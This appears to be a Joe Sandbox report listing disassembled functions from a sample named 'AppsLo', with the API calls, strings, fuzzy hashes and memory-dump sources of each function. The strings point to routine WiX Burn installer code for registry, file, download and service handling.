Opcode Fuzzy Hash: 7f167168b9d0d6b14a780b7e790474dc6f9c20832da80e1f2a1068dcf3c5d234
Instruction Fuzzy Hash: 3451917190426AAFDB21DBA9C844EAEB7BCFF46714F210194E905EB250DB31ED00CBA1

Function 008E1217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008E123F
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008B70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008E1276
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 008E136E

Strings

BundleUpgradeCode, xrefs: 008E121E
regutil.cpp, xrefs: 008E12BF

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 72d01f4ee56b924e4f8b8b380d789c8e55ad7025350c884539863a3403c1c2af
Instruction ID: 5d770f03740b999bc9f77c3ecf1f11a97131e9c95c9398e98984d79c4cb60067
Opcode Fuzzy Hash: 72d01f4ee56b924e4f8b8b380d789c8e55ad7025350c884539863a3403c1c2af
Instruction Fuzzy Hash: E741B235A0019AEFDF21DF96C848AAEB7AAFB46714F154169FD01EB740D6349D00DBA0

Function 008E6357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008E490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,008B8770,00000000,00000000,00000000,00000000,00000000), ref: 008E4925
Part of subcall function 008E490D: GetLastError.KERNEL32(?,?,?,008B8770,00000000,00000000,00000000,00000000,00000000), ref: 008E492F

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,008E5C09,?,?,?,?,?,?,?,00010000,?), ref: 008E63C0
WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,008E5C09,?,?,?,?), ref: 008E6412
GetLastError.KERNEL32(?,008E5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008E6458
GetLastError.KERNEL32(?,008E5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008E647E

Strings

dlutil.cpp, xrefs: 008E64A2

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLast$Write$Pointer
String ID: dlutil.cpp
API String ID: 133221148-2067379296
Opcode ID: 645e8c395509beb6c67d77c588fe887d256590bd7c292ce36cca0b3c67794ca2
Instruction ID: db4e68b1218905a2ed18aad79184587c514cd5f16cbe689889cb3d9e12f3ec3b
Opcode Fuzzy Hash: 645e8c395509beb6c67d77c588fe887d256590bd7c292ce36cca0b3c67794ca2
Instruction Fuzzy Hash: 5241A07290025ABFDB218E96CD45FAE7B68FF153A8F154125FD00E61A0E331DD20DBA5

Function 008A2428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,008DFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008DFFEF,008C12CF,?,00000000), ref: 008A246E
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008DFFEF,008C12CF,?,00000000,0000FDE9,?,008C12CF), ref: 008A247A

Part of subcall function 008A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BDB
Part of subcall function 008A3BD3: HeapSize.KERNEL32(00000000,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BE2

Strings

strutil.cpp, xrefs: 008A249E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 0ccec4bd111e5726a4ebedd371f76685ecbc675aa8f5f15bdabf9e590af17dfc
Instruction ID: 26073edd57c54f92a28965a16108a37f05a389e385649991784701c0b3d99355
Opcode Fuzzy Hash: 0ccec4bd111e5726a4ebedd371f76685ecbc675aa8f5f15bdabf9e590af17dfc
Instruction Fuzzy Hash: 4531E53020161AAFF7309E6D8CC4A66379AFB4B368B104229FE11DBAA0E775DC018764

Function 008CAD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 008CADB3

Strings

Failed to open container: %ls., xrefs: 008CAD85
Failed to extract all payloads from container: %ls, xrefs: 008CADF7
Failed to extract payload: %ls from container: %ls, xrefs: 008CAE3E
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 008CAE4A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 1825529933-3891707333
Opcode ID: b59b770c47bd68d489b21898c564621946d75cc22b57dcc0f798d406f770b5b3
Instruction ID: fa3414e1b66fc5143fc1d7560df40cb9034a376c4a7269397745e9c827071cf2
Opcode Fuzzy Hash: b59b770c47bd68d489b21898c564621946d75cc22b57dcc0f798d406f770b5b3
Instruction Fuzzy Hash: C631D232C0011DAACF22AAE88C45F9E7778FF05718F104615FA21E6591E735DA54DBE2

Function 008E7A10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

SysFreeString.OLEAUT32(00000000), ref: 008E7AF4
SysFreeString.OLEAUT32(?), ref: 008E7AFF
SysFreeString.OLEAUT32(00000000), ref: 008E7B0A

Strings

atomutil.cpp, xrefs: 008E7A3D
`Dv, xrefs: 008E7AE9

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `Dv$atomutil.cpp
API String ID: 2724874077-1153537316
Opcode ID: 9136245095d493d15050fd43b96abd03cd1229d90926809ef438136a40648325
Instruction ID: 0d90e47aa3482cce8a89fc6e7968f78605419c7ac563faa4546a0d97467f538b
Opcode Fuzzy Hash: 9136245095d493d15050fd43b96abd03cd1229d90926809ef438136a40648325
Instruction Fuzzy Hash: 1F318232D0857ABBDB229B99CC45E9EBBA8FF02754F1141B5FA00FB150D770AE009B91

Function 008AF005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,008B0654,00000001,00000001,00000001,008B0654,00000000), ref: 008AF07D
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,008B0654,00000001,00000001,00000001,008B0654,00000000,00000001,00000000,?,008B0654,00000001), ref: 008AF09A

Strings

Failed to format key for update registration., xrefs: 008AF033
PackageVersion, xrefs: 008AF05E
Failed to remove update registration key: %ls, xrefs: 008AF0C7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: 87754dbb98e82fb04f87d23bbf59ebb284542a1976bdf0e045785615affcd144
Instruction ID: e5166d3404bb03368f70a93f457d22ccfaee2f768191b7cccfb2f3f7d38f0897
Opcode Fuzzy Hash: 87754dbb98e82fb04f87d23bbf59ebb284542a1976bdf0e045785615affcd144
Instruction Fuzzy Hash: 36218631900569BBDB21ABA9CC49FAFBEB8FF02720F100275BA14E6152E7755A40CA91

Function 008E433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E4440: FindFirstFileW.KERNEL32(008C923A,?,00000100,00000000,00000000), ref: 008E447B
Part of subcall function 008E4440: FindClose.KERNEL32(00000000), ref: 008E4487

RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 008E4430

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

Part of subcall function 008E1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008E123F
Part of subcall function 008E1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008B70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008E1276

Strings

\, xrefs: 008E43B9
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 008E436F
PendingFileRenameOperations, xrefs: 008E439B
crypt32.dll, xrefs: 008E4368

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: c1ff7c6e641185eaa19a7dc8b582ce1aabda8c216e337090a8604faedb262d55
Instruction ID: 9a539d9458bb1340471edc4666caaa9ca80fe067323343382e673df6357b3f5f
Opcode Fuzzy Hash: c1ff7c6e641185eaa19a7dc8b582ce1aabda8c216e337090a8604faedb262d55
Instruction Fuzzy Hash: 2131C031E01249EBDF20AF86CC41AAEB775FF02758F54907AE909E6292E3319E50CB55

Function 008E4019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,008A4DBC,00000000,?,?,00000000,?,008E412D,00000000,008A4DBC,00000000,00000000,?,008B85EE,?,?), ref: 008E4033
GetLastError.KERNEL32(?,008E412D,00000000,008A4DBC,00000000,00000000,?,008B85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008E4041
CopyFileW.KERNEL32(00000000,008A4DBC,00000000,008A4DBC,00000000,?,008E412D,00000000,008A4DBC,00000000,00000000,?,008B85EE,?,?,00000001), ref: 008E40AC
GetLastError.KERNEL32(?,008E412D,00000000,008A4DBC,00000000,00000000,?,008B85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008E40B6

Strings

fileutil.cpp, xrefs: 008E40D5

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 30695bc453d60129f29f3029e79b107404f2c53fbd6d25a634a8b4706591c727
Instruction ID: 0cc92ce06f2ea3c3a724f68edadaa1331786ec20566391ddc2a9a903bcdc2687
Opcode Fuzzy Hash: 30695bc453d60129f29f3029e79b107404f2c53fbd6d25a634a8b4706591c727
Instruction Fuzzy Hash: 1F210436604BF697EB700AAB4C80B3B6698FF12BA0B151136FF0CDF151E7948C4082E1

Function 008AEF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008AEF56

Part of subcall function 008E4153: SetFileAttributesW.KERNEL32(008C923A,00000080,00000000,008C923A,000000FF,00000000,?,?,008C923A), ref: 008E4182
Part of subcall function 008E4153: GetLastError.KERNEL32(?,?,008C923A), ref: 008E418C

Part of subcall function 008A3C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,008AEFA1,00000001,00000000,00000095,00000001,008B0663,00000095,00000000,swidtag,00000001), ref: 008A3C88

Strings

Failed to allocate regid folder path., xrefs: 008AEFBC
Failed to format tag folder path., xrefs: 008AEFC3
Failed to allocate regid file path., xrefs: 008AEFB5
swidtag, xrefs: 008AEF65

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AttributesDirectoryErrorFileLastOpen@16Remove
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
API String ID: 1428973842-4170906717
Opcode ID: 3ceecccb2ad2891836745d026e05925384f8c6acf16590b4af4585fa5892dfcc
Instruction ID: cd3c60a1095aff5dbc0d4194d609af1d5f2b9ed12c94e445ecb63afa1fe03a0c
Opcode Fuzzy Hash: 3ceecccb2ad2891836745d026e05925384f8c6acf16590b4af4585fa5892dfcc
Instruction Fuzzy Hash: 64216731900518FFEF11EB99CC41AADFBB5FF86310F1080A6F514F66A1DB719A40AB91

Function 008C8DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 008C8E3A
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,008AF7E0,00000001,00000100,000001B4,00000000), ref: 008C8E88

Strings

Failed to open uninstall registry key., xrefs: 008C8DFD
Failed to enumerate uninstall key for related bundles., xrefs: 008C8E99
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 008C8DD7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: 2c3344aecfe7a60fd454b3714afeba68069a2f2841b89604686b5511d0c83732
Instruction ID: 6c23943517b6e2c8164d8ff0602ce90abe83e43001e4af83c34105a8cc9af95f
Opcode Fuzzy Hash: 2c3344aecfe7a60fd454b3714afeba68069a2f2841b89604686b5511d0c83732
Instruction Fuzzy Hash: 6D21C93294022DFFDF11AAA4CC45FEEBA79FB00720F144568F510F6060DB759E90D690

Function 008CD259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

WaitForSingleObject.KERNEL32(?,000000FF), ref: 008CD2EE
ReleaseMutex.KERNEL32(?), ref: 008CD31C
SetEvent.KERNEL32(?), ref: 008CD325

Strings

NetFxChainer.cpp, xrefs: 008CD293
Failed to allocate buffer., xrefs: 008CD29D

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: da78377b1bec9fdf27931919bbce32343e7c7a5ae6a9d2a5db90cf88aec033be
Instruction ID: 2e3f455f6c496355847a7017ee2a8e43e81a770aaac5cb6e78aa0ef870fe1bfa
Opcode Fuzzy Hash: da78377b1bec9fdf27931919bbce32343e7c7a5ae6a9d2a5db90cf88aec033be
Instruction Fuzzy Hash: 1D21A374A0034ABFDB10AF68D884A59B7F5FF49324F108639F964EB351C771E9508B91

Function 008E5907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,008C6B11,00000000,?), ref: 008E591D
GetLastError.KERNEL32(?,?,008C6B11,00000000,?,?,?,?,?,?,?,?,?,008C6F28,?,?), ref: 008E592B

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,008C6B11,00000000,?), ref: 008E5965
GetLastError.KERNEL32(?,?,008C6B11,00000000,?,?,?,?,?,?,?,?,?,008C6F28,?,?), ref: 008E596F

Strings

svcutil.cpp, xrefs: 008E594E, 008E5990

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: 6ecb6d5632cbea1d714ad68c5074522dd72d2bc19328d683b489205024325e7a
Instruction ID: 54685f4b3a66160cd6a44b0817c9d7ceb1f7789710f634e110987de54238207e
Opcode Fuzzy Hash: 6ecb6d5632cbea1d714ad68c5074522dd72d2bc19328d683b489205024325e7a
Instruction Fuzzy Hash: DE21D436941A7AF7E7317A96AD04BDF6E69FB42B78F110011BD04EB242E720CE0096E1

Function 008E3245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 008E3258
VariantInit.OLEAUT32(?), ref: 008E3264
VariantClear.OLEAUT32(?), ref: 008E32D8
SysFreeString.OLEAUT32(00000000), ref: 008E32E3

Part of subcall function 008E3498: SysAllocString.OLEAUT32(?), ref: 008E34AD

Strings

`Dv, xrefs: 008E32E3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID: `Dv
API String ID: 347726874-3059127152
Opcode ID: bfffae4eb99df97ebcdd891c690c5405f190a85d504351a9f3fce663f8a02fa6
Instruction ID: 3c7bf3e4565b3bcb05cfc51b903e3a7960680a1786932a20235f1efcbcc72ec2
Opcode Fuzzy Hash: bfffae4eb99df97ebcdd891c690c5405f190a85d504351a9f3fce663f8a02fa6
Instruction Fuzzy Hash: 6E214C31A0125AAFCB15DFA5C89CEAFBBB9FF49716F104158E901EB220D7319E05CB90

Function 008A9839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 008A98C8

Strings

condition.cpp, xrefs: 008A986A, 008A98AB
Failed to find variable., xrefs: 008A98B5
Failed to read next symbol., xrefs: 008A98E4
Failed to parse condition '%ls' at position: %u, xrefs: 008A987A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: b47aaf601bac0e7d933eabc29a727d46120cce1805ba8a077b3794e198bf29a6
Instruction ID: d08bbc685275babf45a47db96fad8d5452134228b36c4efbc6337c8e91fa09fe
Opcode Fuzzy Hash: b47aaf601bac0e7d933eabc29a727d46120cce1805ba8a077b3794e198bf29a6
Instruction Fuzzy Hash: CD112B32284215BBFF152D6D9C86D963A54FF07721F004030FD50EDA92C6AAC910C7E1

Function 008A9E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008A9E38

Strings

Failed get file version., xrefs: 008A9E78
File search: %ls, did not find path: %ls, xrefs: 008A9EA3
Failed to format path string., xrefs: 008A9E43
Failed to set variable., xrefs: 008A9E97

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: 6db5caf945942aab8c1dd410ac220f926aab69118d71490c9b84fd6b672e4f72
